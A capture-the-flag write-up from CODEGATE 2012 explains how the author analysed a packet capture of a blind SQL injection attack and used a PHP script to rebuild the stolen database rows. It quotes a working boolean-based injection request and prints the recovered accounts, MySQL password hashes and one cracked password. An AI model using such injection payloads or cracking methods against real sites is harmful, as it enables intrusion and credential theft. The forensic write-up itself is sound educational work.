26
Feb
2012

CODEGATE 2012 – Network 400

Challenge Description

Because of vulnerability of site in Company A, database which contains user’s information was leaked. The file is dumped packet at the moment of attacking.
Find the administrator’s account information which was leaked from the site.
For reference, some parts of the packet was blind to XXXX.

Answer : strupr(md5(database_name|table_name|decode(password_of_admin)))

So, we got a PCAP file with a nice SQL Injection attack on some web application. As it turns out this is a blind/boolean based injection, so we can’t easily tell what data got extracted. Time to write a little tool..

Some assumptions can be made, a common line from this attack look like this:

GET /sc/id_check.php?name=music' AND ORD(MID((SELECT IFNULL(CAST(sex AS CHAR(10000)), CHAR(32)) FROM xxxxxx.XXXXXX LIMIT 10, 1), 2, 1)) > 8 AND 'aPafq'='aPafq HTTP/1.1

So we’re mostly interested in the MID, LIMIT and comparison value. Let’s extract those, but how do we easily determine the reply? An easy way is looking at the “Content-Length” in the response body for a specific request, if the length is 4 it means the statement was true.

Without further ado, our reverse-SQLi script πŸ˜‰

<?
$out = explode("\n", urldecode(
    `strings 400.pcap  | egrep "GET|Content-Length" | grep -A1 LIMIT`
));

$score = array();
$lastk = '';

for($i = 0; $i < count($out); $i += 2) {
    $out[$i] = trim(preg_replace('!\s+!', ' ',
        preg_replace('/[^0-9 ]/', "", $out[$i])
    ));

    $p = explode(" ", $out[$i]);

    if (count($p) < 6)
        continue;

    if (substr($out[$i+1],0,16) != "Content-Length: ")
        continue;

    $p[] = trim(substr($out[$i+1], 16));
    $p   = array_slice($p, -6, 6);

    $k = $p[0].$p[1].$p[2];

    if ($k!=$lastk) {
        $score[] = 0;
    }

    if ($p[5] == "4")
        $p[3]++;

    $score[count($score)-1]=$p[3];
    $lastk = $k;
}

foreach ($score as $key => $val) {
    if($val==1)
        $val=0x0a;

    echo chr($val);
}
?>
$ php parse.php
7
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
3
monitor@cdgate.xxx
08b5411f848a2581a41672a759c87380
2
monitor
*1763CA06A6BF4E96A671D674E855043A9C7886B2
f
apple@cdgate.xxx
apple
3
apple
*C5404E97FF933A91C48743E0C4063B2774F052DD
m
music@cdgate.xxx
music
6
music
*DBA29A581E9689455787B273C91D77F03D7FAD5B
m
computer@cdgate.xxx
computer
2
computer
*8E4ADF66627261AC0DE1733F55C7A0B72EC113FB
f
com@cdgate.xxx
com
3
com
*FDDA9468184E298A054803261A4753FF4657E889
f
lyco@cdgate.xxx
lynco
4
*EEFD19E63FA33259154630DE24A2B17772FAC630
*0ECBFBFE8116C7612A537E558FB7BE1293576B78
f
mouse@cdgate.xxx
mouse
4
*87A5750BB01F1E52060CF8EC90FB1344B1D413AA
*6FF638106693EF27772523B0D5C9BFAF4DD292F1
m
root@cdgate.xxx
root
6
root
*300102BEB9E4DABEB8BD60BB9BB6686A6272C787
f
desktop@cdgate.xxx
desktop
1
desktop
*DDD9B83818DB7B634C88AD49396F54BD0DE31677
f
www@cdgate.xxx
4eae35f1b35977a00ebd8086c259d4c9
8
www
*3E8563E916A490A13918AF7385B8FF865C221039
f
notebook@cdgate.xxx
notebook
8
fb5d1b4a2312e239652b13a24ed9a74f
*18DF7FA3EE218ACB28E69AF1D643091052A95887
m

Nice! Now we have all data that was retrieved by the attackers. The hashed passwords in there are MySQL (4.x) passwords. Some bruteforce crunchtime later..

*DDD9B83818DB7B634C88AD49396F54BD0DE31677 = etagcd
$ php -r 'echo strtoupper(md5("cdgate|member|etagcd"));'
AB6FCA7FFC88710CFBC37D5DF9A25F3F

Flag: AB6FCA7FFC88710CFBC37D5DF9A25F3F

Comments are closed.